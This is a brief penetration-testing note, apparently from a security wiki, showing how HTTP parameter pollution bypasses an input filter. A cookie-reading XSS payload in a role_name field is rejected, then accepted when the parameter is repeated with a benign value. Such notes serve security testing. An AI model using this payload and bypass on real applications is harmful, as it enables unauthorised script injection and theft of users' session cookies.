Parameter Pollution
Bypass with &asad
Test Case: 1
role_name=<img+src=x+onerror=alert(document.cookie)>
400 Bad Request
......
Only words and numbers are allowed.
--------------------------------------
role_name=<img+src=x+onerror=alert(document.cookie)>&role_name=test
......
200 ok
Bypass: The application successfully accepted both parametersrole_name=<img+src=x+onerror=alert(document.cookie)>&role_name=testLast updated